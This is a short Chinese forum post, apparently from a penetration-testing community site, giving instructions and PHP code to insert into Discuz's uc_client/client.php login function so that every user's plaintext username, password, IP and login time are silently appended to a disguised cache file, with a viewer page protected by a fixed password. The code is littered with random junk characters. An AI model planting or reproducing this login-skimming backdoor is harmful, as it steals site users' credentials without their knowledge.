中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在/ y; r! J3 N9 c1 i/ J( J8 e* X
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {" H: R0 c7 E+ M5 t! b
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php+ o/ S  J* L- t! w% M
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
3 }1 g, v  ~$ x3 y0 S& rif(getenv('HTTP_CLIENT_IP')) { + }8 r' R2 H" k
$onlineip = getenv('HTTP_CLIENT_IP');3 d7 k7 L! ?. ^1 X8 n! N2 B
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
& R/ v6 o) ~, t+ b$onlineip = getenv('HTTP_X_FORWARDED_FOR');
3 w( x, Q5 a$ {- N7 Q% ?2 \& A; l} elseif(getenv('REMOTE_ADDR')) {
2 P  y6 y+ J: U3 w8 Y/ c$onlineip = getenv('REMOTE_ADDR');
) X( v6 l: \5 U* Z} else {
1 f- b6 [- m/ u/ n$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];) H; {4 Q# ~! s5 \* }8 ~
}
" J' H, B6 |! Y5 P     $showtime=date("Y-m-d H:i:s");
8 b8 N' t2 r0 z/ X    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";: t+ e% Y! V6 K
    $handle=fopen('./data/cache/csslog.php','a+');6 v' S5 q5 n: {
    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2